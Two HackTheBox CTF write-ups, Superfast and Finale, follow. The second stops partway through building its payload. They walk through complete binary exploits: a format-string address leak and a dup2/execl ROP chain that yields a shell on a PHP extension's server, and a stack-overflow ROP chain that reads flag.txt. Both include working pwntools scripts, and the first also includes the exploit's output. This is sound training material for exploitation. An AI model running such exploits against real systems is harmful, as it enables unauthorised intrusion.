28 Nov

Superfast (HackTheBox)

Hey folks. In this write-up, we're going to discuss the Superfast challenge on HackTheBox, which was part of the HackTheBox Business CTF 2022. We're going to perform a single-byte overwrite to bypass ASLR, leak stack pointers, and build a Return-Oriented Programming (ROP) chain. The description of the challenge is:

We've tracked connections made from an infected workstation back to this server. We believe it is running a C2 checkin interface, the source code of which we acquired from a temporarily exposed Git repository several months ago. Apparently the engineers behind it are obsessed with speed, extending their programs with low-level code. We think in their search for speed they might have cut some corners – can you find a way in?

I really enjoyed pwning this challenge since it has a unique and quite realistic target which I haven't seen before in CTFs.

Index

  • First looks
  • Finding primitives
  • Developing the ROP chain
  • Retrieving the flag

First looks

We're given a PHP file with a shared object (.so) written in C, and we're given a source directory for the shared object.

.
├── build_docker.sh
├── challenge
│   ├── index.php
│   ├── php_logger.so
│   └── start.sh
├── Dockerfile
└── src
    ├── build.sh
    ├── config.m4
    ├── php_logger.c
    └── php_logger.h

2 directories, 9 files
Directories given with the challenge

In /challenge/start.sh we can see that the challenge code gets bootstrapped using:

#!/bin/sh
while true; do php -dextension=/php_logger.so -S 0.0.0.0:1337; done
The content of start.sh

We can see that PHP loads php_logger.so as a binary extension for the webserver.

Finding primitives

To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork.

Analysing index.php

The content of index.php (below) checks for a header called Cmd-Key and a parameter cmd.

<?php
if (isset($_SERVER['HTTP_CMD_KEY']) && isset($_GET['cmd'])) {
    $key = intval($_SERVER['HTTP_CMD_KEY']);
    if ($key <= 0 || $key > 255) {
        http_response_code(400);
    } else {
        log_cmd($_GET['cmd'], $key);
    }
} else {
    http_response_code(400);
}
Content of index.php

One of the most important stages of exploit development is building a reproducible environment. Since I want to run GDB on php_logger.so, I will run the challenge without Docker. I can serve index.php with php -dextension=./php_logger.so -S 0.0.0.0:1337 in /challenge/ and send the HTTP request using curl 'http://127.0.0.1:1337/index.php?cmd=123' -H 'Cmd-Key: 123'. We can see it succeeds because it returns a 200 status code.

[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Accepted
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 [200]: GET /?cmd=123
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Closing
Verbose output of the PHP webserver

Regarding functionality, we can see that index.php calls log_cmd($cmd, $key) with 0 < $key < 256.

Analyzing php_logger.so

We can find the source code of php_logger.so in /src/php_logger.c, which also contains the source code of log_cmd(). We can see that log_cmd() retrieves its arguments using zend_parse_parameters(). Then, it calls decrypt($cmd, $cmdlen, $key) and, if the return value is valid, appends the result to the /tmp/log file.

PHP_FUNCTION(log_cmd) {
    char* input;
    zend_string* res;
    size_t size;
    long key;

    if (zend_parse_parameters(ZEND_NUM_ARGS(), "sl", &input, &size, &key) == FAILURE) {
        RETURN_NULL();
    }

    res = decrypt(input, size, (uint8_t)key);
    if (!res) {
        print_message("Invalid input provided\n");
    } else {
        FILE* f = fopen("/tmp/log", "a");
        fwrite(ZSTR_VAL(res), ZSTR_LEN(res), 1, f);
        fclose(f);
    }
    RETURN_NULL();
}
Source code of log_cmd()

This function does look safe, so the vulnerability must be in decrypt(input, size, key). This function checks whether the size of the command is smaller than the size of the stack buffer. If it is larger, it returns NULL; otherwise it memcpy()s the input into the buffer and XORs the buffer with the key.

zend_string* decrypt(char* buf, size_t size, uint8_t key) {
    char buffer[64] = {0};
    if (sizeof(buffer) - size > 0) {
        memcpy(buffer, buf, size);
    } else {
        return NULL;
    }
    for (int i = 0; i < sizeof(buffer) - 1; i++) {
        buffer[i] ^= key;
    }
    return zend_string_init(buffer, strlen(buffer), 0);
}
Source code of decrypt()

We can see that sizeof(buffer) - size > 0 is used for the size check. However, sizeof() returns size_t, which is an unsigned integer on 32-bit and (in this case) an unsigned long on 64-bit, and size is a size_t as well. Since the subtraction is carried out on unsigned values, the result can never be negative: it wraps around instead. For example, (unsigned int)0 - 1 becomes 2**32-1 instead of -1. A practical example is the one below. The output of the program is 4294967295 1.

#include <stdio.h>

int main()
{
    unsigned int a = 5;
    int b = 6;
    printf("%u %d", a - b, a - b > 0);
}
Demo of interaction between (unsigned) integers
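
For the 64-bit size_t used in decrypt(), the same wrap-around can be modelled in Python by masking the subtraction to 64 bits. This is only a sketch: the helper name size_check_passes is made up for illustration, and the 64-bit width is an assumption about the target.

```python
MASK64 = (1 << 64) - 1  # assumed width of size_t on the 64-bit target


def size_check_passes(buffer_size: int, size: int) -> bool:
    """Model `sizeof(buffer) - size > 0` using unsigned 64-bit arithmetic."""
    return ((buffer_size - size) & MASK64) > 0


# Sizes below, equal to, and above the 64-byte buffer.
for size in (10, 64, 65, 153):
    print(size, size_check_passes(64, size))
```

Only the size that equals the buffer size is rejected; every larger size slips through because the difference wraps around to a huge positive number.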

That means that sizeof(buffer) - size > 0 is always true, unless sizeof(buffer) == size. The result is a buffer overflow on the stack, which we can leverage for a control flow hijacking primitive. Using Ghidra, the reverse engineering suite developed by the NSA, we can see that the offset from the buffer to the return address on the stack is 0x98 (152) bytes.

Stack variable offsets in Ghidra

However, ASLR is enabled. That means that we cannot guess the library's memory address and hence cannot guess a return address for control flow hijacking. However, the lowest 12 bits of an address are not random, and thus we can reliably overwrite those 12 bits of the return address. Say our normal return address would be 0x555555559a1e; on the next run it could be 0x55555123fa1e, but the 0xa1e at the end doesn't change, because it's the lowest 12 bits.

The reason only the lowest 12 bits of the address don't change is that they are the offset within a 4096-byte (2 ** 12) page. The kernel, which manages ASLR, maps memory in whole pages and therefore cannot randomize anything below page granularity.

Sadly, we can only write bundles of 8 bits (1 byte) at a time considering we're working with a char data type. This means we could only overwrite the 0x1e part of the addresses listed above, which narrows our possible return address area.
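
To make the one-byte window concrete, here is a small sketch of which addresses we can reach. The helper names are hypothetical; the example address is the one used above. Because x86-64 is little-endian, the least significant byte of the return address is the first one an overflow reaches.

```python
def reachable_by_one_byte(return_address: int) -> range:
    """Addresses reachable by overwriting only the least significant byte."""
    base = return_address & ~0xFF
    return range(base, base + 0x100)


def overwrite_low_byte(return_address: int, new_byte: int) -> int:
    """Replace the least significant byte, as a 1-byte overflow would."""
    return (return_address & ~0xFF) | (new_byte & 0xFF)


# Example address from the text above; any randomized base behaves the same.
original = 0x555555559A1E
window = reachable_by_one_byte(original)
print(hex(window.start), hex(window.stop - 1))
print(hex(overwrite_low_byte(original, 0x40)))
```

Whatever the randomized upper bits are, the overwritten address stays inside the same 256-byte window, so no leak is needed for this first step.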

In Ghidra, we can figure out that the return address from decrypt() to log_cmd() (without ASLR) is 0x101429. This means our scope of possible return addresses ranges from 0x101400 to 0x1014ff.

0010141e 48 89 ce           MOV   param_2,RCX
00101421 48 89 c7           MOV   param_1,RAX
00101424 e8 07 fc ff ff     CALL  decrypt
00101429 48 89 44 24 38     MOV   qword ptr [RSP + local_10],RAX
0010142e 48 83 7c 24 38 00  CMP   qword ptr [RSP + local_10],0x0

The code in our return scope is the following. We can see that decrypt() is called, followed by either print_message() or a handful of file I/O functions. Internally, print_message() is a wrapper for php_printf(): the printf() function in PHP. This is interesting because it outputs to the HTTP response body, which means that we can leak pointers.

        *(undefined4 *)(param_2 + 8) = 1;
    }
    else {
        iVar1 = decrypt(local_20,local_28,(size_t *)(local_30 & 0xff),local_28,(size_t)inlen);
        local_10 = CONCAT44(extraout_var,iVar1);
        if (local_10 == 0) {
            print_message("Invalid input provided\n");
        }
        else {
            local_18 = fopen("/tmp/log","a");
            fwrite((void *)(local_10 + 0x18),*(size_t *)(local_10 + 0x10),1,local_18);
            fclose(local_18);
        }
        *(undefined4 *)(param_2 + 8) = 1;
    }
    return;
}
C decompilation of our return scope 

However, in order to leak pointers with print_message(), we need to set the RDI register to the printf format string. Fortunately, the RDI register is set to the input argument of decrypt(char* buf, size_t size, uint8_t key) at 0x101390.

00101385 48 8b 84 24 a0 00 00 00  MOV   RAX,qword ptr [RSP + local_18]
0010138d 48 89 c6                 MOV   inputlen,RAX
00101390 48 89 cf                 MOV   input,param_4
00101393 e8 e8 fc ff ff           CALL  <EXTERNAL>::memcpy
00101398 48 8b 54 24 60           MOV   key,qword ptr [RSP + local_58]
Assembly code which moves the input into the RDI register

When I try to fuzz using a script, I receive the following output:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@\x81\xd5\x84U\x80~
Fuzzing output
from pwn import xor
import requests

xorkey = 1
s = requests.session()
headers = {"cmd-key": str(xorkey)}

# offset = 152
payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(xor(content, xorkey))
Script used to fuzz

However, when we remove the xor() function call, we can see that the end of the response is an address like b'A\x80\xd4\x85T\x81\x7f'. Using print(hex(u64(content[63:].ljust(8, b'\x00')))) we can translate it to 0x7f815485d48041. In order to identify where this leak happens, we can start a GDB server. We leak the address 0x7f651305f54041 and in GDB we can see with vmmap (in pwndbg) that this falls under 0x7f6513000000     0x7f6513200000 rw-p   200000      0 [anon_7f6513000]. Since this isn't executable it's irrelevant for the ROP chain.
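
For readers without pwntools at hand, the u64() step can be sketched with the standard library only. The byte string is the response tail quoted above; treating everything after the first byte as the pointer is my own assumption, based on buffer[63] being the one payload byte the XOR loop never touches.

```python
leak_bytes = b"A\x80\xd4\x85T\x81\x7f"  # tail of the response quoted above

# Pad to 8 bytes and interpret as a little-endian unsigned integer,
# which is what u64(... .ljust(8, b"\x00")) does.
value = int.from_bytes(leak_bytes.ljust(8, b"\x00"), "little")
print(hex(value))

# Assumption: the lowest byte (0x41) is our own "A" at buffer[63],
# so the pointer proper starts one byte later.
pointer_part = value >> 8
print(hex(pointer_part))
```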

from pwn import xor, gdb, u64
import requests
import time

gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
time.sleep(5)

xorkey = 1
s = requests.session()
headers = {"cmd-key": str(xorkey)}

payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(hex(u64(content[63:].ljust(8, b'\x00'))))

time.sleep(999)
Script for debugging using GDB

Since that is useless, we need to find another way to leak addresses. To do that, we can utilize the fact that we're calling printf(). By supplying a payload like %08x %08x %08x %08x we can leak the stack. By trial and error, I found out that we can leak the stack, php_logger.so and the PHP binary using the format string %llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_. Using the following payload, we can see the following leaks:

php @ 0x55c720a64000
php_logger.so @ 0x7f609866e000
stack @ 0x7fff10fbd480
Output of the script
#!/usr/bin/env python3
from pwn import xor, u64, gdb
import requests
import time

gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
time.sleep(3)

xorkey = 0x4
s = requests.session()
headers = {"cmd-key": str(xorkey)}

fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), xorkey) + b"\x40"
url = b"http://127.1:1337/index.php?cmd=" + payload
print(url)

content = s.get(url, headers=headers).content
addresses = content.split(b"_")

php_base = int(addresses[5], 16)-0x55e240
logger_base = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16)

print("php @", hex(php_base))
print("php_logger.so @", hex(logger_base))
print("stack @", hex(stack))

time.sleep(999)
Payload for leaking addresses
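
The two ideas in that script, pre-XORing the format string so that decrypt() restores it and turning the response into base addresses, can be tried offline with the sketch below. The helper names are hypothetical, xor_bytes is a stand-in for pwn.xor, and the sample response is made up: only fields 0, 5 and 8 mirror the leak shown above.

```python
FMT = b"%llx_" * 9  # same nine-specifier format string as in the script


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (stand-in for pwn.xor)."""
    return bytes(b ^ key for b in data)


def build_payload(key: int, offset: int = 152, low_byte: int = 0x40) -> bytes:
    """Pre-XOR the padded format string, then append the 1-byte overwrite."""
    padded = FMT + b"A" * (offset - len(FMT))
    return xor_bytes(padded, key) + bytes([low_byte])


def parse_leak(body: bytes) -> dict:
    """Split the '_'-separated hex values and apply the script's offsets."""
    fields = body.split(b"_")
    return {
        "stack": int(fields[0], 16),
        "php": int(fields[5], 16) - 0x55E240,
        "php_logger.so": int(fields[8], 16) - 0x1445,
    }


payload = build_payload(key=0x4)
# decrypt() XORs the first 63 bytes again, which restores the format string.
restored = xor_bytes(payload[:len(FMT)], 0x4)

# Hypothetical response body: only fields 0, 5 and 8 mirror the leak above.
sample = b"7fff10fbd480_0_0_0_0_55c720fc2240_0_0_7f609866f445_"
bases = parse_leak(sample)
for name, base in bases.items():
    print(name, "@", hex(base))
```

The format string is 45 bytes long, so it fits entirely inside the 63 bytes that decrypt() XORs back.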

We have the needed primitives, so we can develop the ROP chain.

Developing the ROP chain

Now we can use pwntools' ELF classes in order to build ROP chains automatically. Using pwntools' ELF class we can see that the execl function is in the PLT section of the php binary. This means we can use it to spawn a shell. Our strategy is:

  1. Leaking the address of the PHP binary and the php_logger.so in memory.
  2. dup2(4, N) to set stdin, stdout and stderr file descriptors to the TCP connection file descriptor for the webserver.
  3. execl("/bin/sh", "/bin/sh", 0) to spawn the /bin/sh executable

We can generate a ROP chain automatically with pwntools:

rop = ROP(php)

'''
fd[0] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3] tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
'''

# set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2])

binsh = next(php.search(b"/bin/sh\x00"))
rop.call('execl', [binsh, binsh, 0])

print(rop.dump())
Python code for generating the ROP chain

Which gives the following ROP chain:

0x0000: 0x56244b60816b pop rdi; ret
0x0008: 0x4 [arg0] rdi = 4
0x0010: 0x56244b6043fc pop rsi; ret
0x0018: 0x0 [arg1] rsi = 0
0x0020: 0x56244b601be0 dup2
0x0028: 0x56244b60816b pop rdi; ret
0x0030: 0x4 [arg0] rdi = 4
0x0038: 0x56244b6043fc pop rsi; ret
0x0040: 0x1 [arg1] rsi = 1
0x0048: 0x56244b601be0 dup2
0x0050: 0x56244b60816b pop rdi; ret
0x0058: 0x4 [arg0] rdi = 4
0x0060: 0x56244b6043fc pop rsi; ret
0x0068: 0x2 [arg1] rsi = 2
0x0070: 0x56244b601be0 dup2
0x0078: 0x56244b60816b pop rdi; ret
0x0080: 0x56244bd03fc3 [arg0] rdi = 94713890750403
0x0088: 0x56244b60487c pop rdx; ret
0x0090: 0x0 [arg2] rdx = 0
0x0098: 0x56244b6043fc pop rsi; ret
0x00a0: 0x56244bd03fc3 [arg1] rsi = 94713890750403
0x00a8: 0x56244b6042d0 execl
ROP chain generated by pwntools

As we can see, it does the following:

dup2(4, 0)
dup2(4, 1)
dup2(4, 2)
execl("/bin/sh", "/bin/sh", 0)
C representation of the ROP chain
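
To see that there is no magic in what pwntools generates, the same chain can be packed by hand. This is a sketch using only the standard library; the addresses are copied from the dump above and are only valid for that particular run, and p64 here is a stand-in for pwn.p64.

```python
import struct

# Addresses copied from the pwntools dump above (valid for that run only).
POP_RDI = 0x56244B60816B
POP_RSI = 0x56244B6043FC
POP_RDX = 0x56244B60487C
DUP2 = 0x56244B601BE0
EXECL = 0x56244B6042D0
BINSH = 0x56244BD03FC3


def p64(value: int) -> bytes:
    """Pack an unsigned 64-bit little-endian value (stand-in for pwn.p64)."""
    return struct.pack("<Q", value)


def dup2_call(old_fd: int, new_fd: int) -> bytes:
    """Gadgets and arguments for dup2(old_fd, new_fd)."""
    return p64(POP_RDI) + p64(old_fd) + p64(POP_RSI) + p64(new_fd) + p64(DUP2)


chain = b"".join(dup2_call(4, fd) for fd in (0, 1, 2))
chain += p64(POP_RDI) + p64(BINSH)
chain += p64(POP_RDX) + p64(0)
chain += p64(POP_RSI) + p64(BINSH)
chain += p64(EXECL)

print(hex(len(chain)))
```

Each pop gadget consumes the next 8 bytes on the stack as its register value, which is why the chain is simply a flat list of 64-bit words.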

Retrieving the flag

I coded the following script to utilize the ROP chain. If we run this, we get a shell on the box.

#!/usr/bin/env python3
from pwn import xor, u64, gdb, ELF, p64, remote, ROP, context
import requests
import time
import urllib.parse  # urllib.parse must be imported explicitly for quote()

#gdb.debug(args=['/usr/bin/php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
#time.sleep(5)

target_ip = b"161.35.173.232"
target_port = b"31302"

target_host = b"http://" + target_ip + b":" + target_port

s = requests.session()
headers = {"cmd-key": "1"}

fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), 1) + b"\x40"

print("[*] sending payload...")
content = s.get(target_host + b"/index.php?cmd=" + payload, headers=headers).content
addresses = content.split(b"_")

print("[*] loading addresses...")
# set context for ROP()
#context.binary = php = ELF('/usr/bin/php', checksec=False)
context.binary = php = ELF('./php', checksec=False)
php.address = int(addresses[5], 16) - php.sym.executor_globals

php_logger = ELF('pwn_superfast/challenge/php_logger.so', checksec=False)
php_logger.address = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16)

print("[+] php @", hex(php.address))
print("[+] php_logger.so @", hex(php_logger.address))
print("[+] stack @", hex(stack))

rop = ROP(php)

'''
fd[0] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3] tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
'''

# set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2])

binsh = next(php.search(b"/bin/sh\x00"))
rop.call('execl', [binsh, binsh, 0])

print(rop.dump())

payload = b'A'*152 + rop.chain()
http = "GET /index.php?cmd=" + urllib.parse.quote(payload) + " HTTP/1.1\n"
http += "Cmd-Key: 1\n\n"

print("[*] sending payload for shell...")
p = remote(target_ip, int(target_port))
p.send(http.encode())
p.interactive()

time.sleep(999)
Python script for retrieving the flag
$ python3 script.py
[*] sending payload...
[*] loading addresses...
[+] php @ 0x55da3ce00000
[+] php_logger.so @ 0x7fb906c50000
[+] stack @ 0x7ffee56eddc0
[*] Loaded 327 cached gadgets for './php'
0x0000: 0x55da3d00816b pop rdi; ret
0x0008: 0x4 [arg0] rdi = 4
0x0010: 0x55da3d0043fc pop rsi; ret
0x0018: 0x0 [arg1] rsi = 0
0x0020: 0x55da3d001be0 dup2
0x0028: 0x55da3d00816b pop rdi; ret
0x0030: 0x4 [arg0] rdi = 4
0x0038: 0x55da3d0043fc pop rsi; ret
0x0040: 0x1 [arg1] rsi = 1
0x0048: 0x55da3d001be0 dup2
0x0050: 0x55da3d00816b pop rdi; ret
0x0058: 0x4 [arg0] rdi = 4
0x0060: 0x55da3d0043fc pop rsi; ret
0x0068: 0x2 [arg1] rsi = 2
0x0070: 0x55da3d001be0 dup2
0x0078: 0x55da3d00816b pop rdi; ret
0x0080: 0x55da3d703fc3 [arg0] rdi = 94395821998019
0x0088: 0x55da3d00487c pop rdx; ret
0x0090: 0x0 [arg2] rdx = 0
0x0098: 0x55da3d0043fc pop rsi; ret
0x00a0: 0x55da3d703fc3 [arg1] rsi = 94395821998019
0x00a8: 0x55da3d0042d0 execl
[*] sending payload for shell...
[+] Opening connection to b'161.35.173.232' on port 31302: Done
[*] Switching to interactive mode
sh: turning off NDELAY mode
$ whoami
ctf
Output of the exploit

Thanks for reading my write-up about the HackTheBox Business CTF 2022 Superfast challenge; I hope you learned as much as I did.

26 Nov

Finale (HackTheBox)

Hey all. Today we're going to discuss the retired Finale challenge on HackTheBox. The description on HackTheBox is as follows:

It's the end of the season and we all know that the Spooktober Spirit will grant a souvenir to everyone and make their wish come true! Wish you the best for the upcoming year!

In this write-up, we will learn about the stack, ROP chains, and prioritizing attack vectors.

Spoiler alert: if you can't find the libc version, it's not a bug.

Summary

  • First looks
  • Finding vulnerability primitives
  • Developing the ROP chain
  • Retrieving the flag
  • Failed attempt

First looks

We are given an executable binary called finale. Upon performing a dynamic analysis, we are prompted for a password which means that we'll need to do a static analysis in order to proceed.

[Strange man in mask screams some nonsense]: iut2rxgf

[Strange man in mask]: In order to proceed, tell us the secret phrase: <...>

[Strange man in mask]: Sorry, you are not allowed to enter here!
The dynamic analysis

Running pwntools' checksec on finale gives us:

$ checksec finale
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
Checksec output

The fields mean:

  • Arch: the CPU architecture and instruction set (x86, ARM, MIPS, …)
  • RELRO: Relocation Read-Only – secures the dynamic linking process
  • Stack Canaries: protects against stack buffer overflow attacks
  • NX: No eXecute – write-able memory cannot be executed
  • PIE: Position Independent Executable – address randomization

For a more in-depth explanation of checksec, please visit our previous blogpost about the Blacksmith challenge on Hack The Box. The logical conclusion is that we need to perform a stack-based buffer overflow (since Stack Canaries are disabled) leading to a Return-Oriented-Programming chain (since NX is enabled).

Finding vulnerability primitives

To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact.

Main() analysis

In order to analyze the binary, I opened it up in Ghidra, made by the NSA. The main() function prints 8 random bytes, asks us for a secret and calls finale().

long main()
{
    int iVar1;
    char secret [16];
    char rand [8];
    ulong i;

    banner();
    rand = 0;
    iVar1 = open("/dev/urandom",0);
    read(iVar1,rand,8);
    printf("\n[Strange man in mask screams some nonsense]: %s\n\n",rand);
    close(iVar1);
    secret._0_8_ = 0;
    secret._8_8_ = 0;
    printf("[Strange man in mask]: In order to proceed, tell us the secret phrase: ");
    __isoc99_scanf("%16s",secret);
    i = 0;
    do {
        if (i > 14) {
LAB_CHECK_SECRET:
            iVar1 = strncmp(secret,"s34s0nf1n4l3b00",15);
            if (iVar1 == 0) {
                finale();
            }
            else {
                printf("%s\n[Strange man in mask]: Sorry, you are not allowed to enter here!\n\n","\x1b[1;31m");
            }
            return;
        }
        if (secret[i] == '\n') {
            secret[i] = '\0';
            goto LAB_CHECK_SECRET;
        }
        i++;
    } while( true );
}
Main function

As we can see, the secret for the binary is s34s0nf1n4l3b00 and finale() gets called after the correct secret has been entered.

Finale() analysis

As said, main() calls finale() after the secret has been entered. This function asks us for a wish for the next year.

void finale()
{
    char buf[64];

    printf("\n[Strange man in mask]: Season finale is here! Take this souvenir with you for good luck: [%p]",buf);
    printf("\n\n[Strange man in mask]: Now, tell us a wish for next year: ");
    fflush(stdin);
    fflush(stdout);
    read(0,buf,0x1000);
    write(1,"\n[Strange man in mask]: That\'s a nice wish! Let the Spooktober Spirit be with you!\n\n",0x54);
    return;
}
Finale function

We are given a stack leak in the form of char* buf. Furthermore, there is a stack buffer overflow: the buffer length is 64 and we are reading up to 0x1000 (4096) bytes into it. In Ghidra we can see that the offset to the return address from the base of buf is 0x48 bytes.

GOT

Considering checksec said No PIE (0x400000), the addresses in the binary are fixed, so we can use the Procedure Linkage Table (PLT) section of the binary. This means we could open a potential flag.txt using open(), read() and write().

Developing the ROP chain

Considering the protections in the binary listed by checksec state that No eXecute is enabled, we need to use Return Oriented Programming (ROP) chains. We want to do the following in the payload:

fd = open("flag.txt", 0);
n_read = read(3, buf, size); // 3 since fd == 3 can be expected
write(1, buf, n_read);

We have access to:

  • Binary/ELF
  •   GOT and PLT (linked functions)
  •  Functions (built-in functions)
  • Stack

Using print(*ELF('challenge/finale').plt.keys()), we can see that the following functions are available in the PLT sections:

strncmp puts write printf alarm
close read srand time fflush
setvbuf open __isoc99_scanf rand
Available functions in the PLT section

Now that we have the right functions and have access to the stack (for "flag.txt"), we need a way to pass function arguments. The x64 (System V AMD64) calling convention states that function arguments should be passed (in order) via RDI, RSI, RDX, RCX, R8, R9. This means that we need to control the RDI, RSI, and RDX registers via pop instructions (called gadgets) in the ROP-chain in order to pass 3 arguments to open(), read(), and write(). We can search for such gadgets using ropr: a blazing fast multithreaded ROP Gadget finder. Below is my search regex filter for ropr:

$ ropr -R '^pop (rdi|rsi|rdx); ret;' challenge/finale
0x004012d6: pop rdi; ret;
0x004012d8: pop rsi; ret;

Sadly, ropr can't find any gadgets for the RDX register. Even after trying many more search queries (like EDX and DX), I couldn't find any results. This means that we need to find a workaround for a high-enough RDX value for read(..., ..., size=RDX).

GNU Debugger (GDB)

In order to find out a way to get a high RDX value, I used GDB with the Pwndbg plug-in (please say /pwn-dbg/ and not /poʊndbæg/ as the repo proposes). To see the RDX value during runtime, we can use the GDB functions in pwntools:

#!/usr/bin/env python3
from pwn import ELF, remote, gdb, p64, u64
import time

e = ELF('challenge/finale')
p = e.process()

# 0x004012d6: pop rdi; ret;
pop_rdi = p64(0x4012d6)

# 0x004012d8: pop rsi; ret;
pop_rsi = p64(0x4012d8)

def leak_func(address):
    payload = b'A'*0x48
    payload += pop_rdi + p64(address) + p64(e.plt.puts) + p64(e.sym.finale)
    p.sendafter(b"next year: ", payload)
    p.recvuntil(b"you!\n\n")  # clear buffer
    return u64(p.recvuntil(b"\n")[:-1].ljust(8, b'\x00'))

p.sendlineafter(b"secret phrase: ", b"s34s0nf1n4l3b00")
p.recvuntil(b"good luck: [")  # clear buffer for next address read
leak = int(p.recvuntil(b"]")[:-1], 16)
print("leak @", hex(leak))

file = b'flag.txt\0'
rbp = leak + 0x170

payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(leak)
payload += pop_rsi + p64(0)
payload += p64(0x4014c7)

gdb.attach(p, 'b *0x4014c7\ncontinue')
p.sendafter(b"next year: ", payload)

while True:
    print(p.recv())
Payload for opening GDB at the open() call
0x00000000004014e0 in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────
 RAX  0x3
 RBX  0x0
 RCX  0x7ffc887475a0 —▸ 0x7f76d739e2e0 ◂— 0x0
 RDX  0x8
*RDI  0x3
 RSI  0x7ffc887475a0 —▸ 0x7f76d739e2e0 ◂— 0x0
 R8   0x3c
 R9   0x7ffc887451bc ◂— 0x3c00007f76
 R10  0x0
 R11  0x246
 R12  0x7ffc887475f8 —▸ 0x7ffc88748289 ◂— '~/Documents/ctf/htb/finale/challenge/finale'
 R13  0x401492 (main) ◂— endbr64
 R14  0x403d70 (__do_global_dtors_aux_fini_array_entry) —▸ 0x4012a0 (__do_global_dtors_aux) ◂— endbr64
 R15  0x7f76d739d040 (_rtld_global) —▸ 0x7f76d739e2e0 ◂— 0x0
 RBP  0x7ffc887475c0 —▸ 0x7ffc887475f0 ◂— 0x1
 RSP  0x7ffc887474c0 ◂— 0xe193b4642436643b
*RIP  0x4014e0 (main+78) ◂— call 0x401170
─────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────
   0x4014cf <main+61>     lea    rcx, [rbp - 0x20]
   0x4014d3 <main+65>     mov    eax, dword ptr [rbp - 0xc]
   0x4014d6 <main+68>     mov    edx, 8
   0x4014db <main+73>     mov    rsi, rcx
   0x4014de <main+76>     mov    edi, eax
 ► 0x4014e0 <main+78>     call   read@plt                      <read@plt>
        fd: 0x3 (~/Documents/ctf/htb/finale/flag.txt)
        buf: 0x7ffc887475a0 —▸ 0x7f76d739e2e0 ◂— 0x0
        nbytes: 0x8

   0x4014e5 <main+83>     lea    rax, [rbp - 0x20]
   0x4014e9 <main+87>     mov    rsi, rax
   0x4014ec <main+90>     lea    rax, [rip + 0x1425]
   0x4014f3 <main+97>     mov    rdi, rax
   0x4014f6 <main+100>    mov    eax, 0
GDB breakpoint dump

As we can see, RDX is equal to 8 which means only 8 bytes of the flag get read and written to stdout. Since we need to read at least 32 bytes, we need to find a way of manipulating the RDX register. We could do this by:

  • Calling open("flag.txt", 0) using the PLT section in the ELF (which only executes the function and immediately returns after)
  • Manipulate RDX
  • Calling 0x4014e0 so we read() with the manipulated RDX and write() to stdout all at once.

As said, I tried finding gadgets which sadly did not work. After manually analyzing the binary I happened to see the following gadget:

00401476 ba 54 00 00 00        MOV   EDX,0x54
0040147b 48 8d 05 2e 14 00 00  LEA   RAX,[s__[Strange_man_in_mask]:_That's_a_ = "\n[Strange man in mask]:
00401482 48 89 c6              MOV   RSI=>s__[Strange_man_in_mask]:_That's_a_ = "\n[Strange man in mask]:
00401485 bf 01 00 00 00        MOV   EDI,0x1
0040148a e8 a1 fc ff ff        CALL  <EXTERNAL>::write      ssize_t write(int __fd, void
0040148f 90                    NOP
00401490 c9                    LEAVE
00401491 c3                    RET
Part of the finale() function

As we can see, the EDX register is set to 0x54. This means we will read and write 84 bytes of the flag, which means it's more than enough and that we have completed the final part of the ROP chain:

  • open@PLT("flag.txt", 0)
  • finale() // to set RDX to 0x54
  • Set RDI to 3
  • Set RSI to the buffer buf
  • JMP 0x4014e0

A.k.a.:

file = b'flag.txt\0'
rbp = leak - 0x5000

payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(leak)
payload += pop_rsi + p64(0)
payload += p64(e.plt.open)
payload += p64(e.sym.finale)  # set RDX
p.sendafter(b"next year: ", payload)

payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(3)
payload += pop_rsi + p64(rbp-0x20)
